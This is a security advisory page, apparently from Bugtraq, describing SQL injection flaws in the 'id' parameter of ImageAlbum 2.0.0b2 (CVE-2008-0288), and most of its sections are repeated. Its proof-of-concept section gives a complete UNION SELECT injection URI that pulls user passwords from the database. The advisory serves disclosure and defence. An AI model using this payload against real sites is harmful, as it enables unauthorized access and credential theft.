ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities
BID:27240
Info
ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 27240 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0288 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | [email protected] is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
ImageAlbum ImageAlbum 2.0.0b2 |
| Not Vulnerable: | |
Discussion
ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities
ImageAlbum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect ImageAlbum 2.00b2; other versions may also be affected.
ImageAlbum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect ImageAlbum 2.00b2; other versions may also be affected.
Exploit / POC
ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URI is available.
http://www.example.com/index.php/[domain]/?action=collection.imageview&id=643635 union all select iaimage.id, iaimage.name, description, iaimage.collection_id, iaimage.domain_id, password As path, access, visits, checked FROM iaimage, iauser WHERE iaimage.id=411 /*
Attackers can use a browser to exploit these issues.
The following proof-of-concept URI is available.
http://www.example.com/index.php/[domain]/?action=collection.imageview&id=643635 union all select iaimage.id, iaimage.name, description, iaimage.collection_id, iaimage.domain_id, password As path, access, visits, checked FROM iaimage, iauser WHERE iaimage.id=411 /*
Solution / Fix
ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities
References:
References: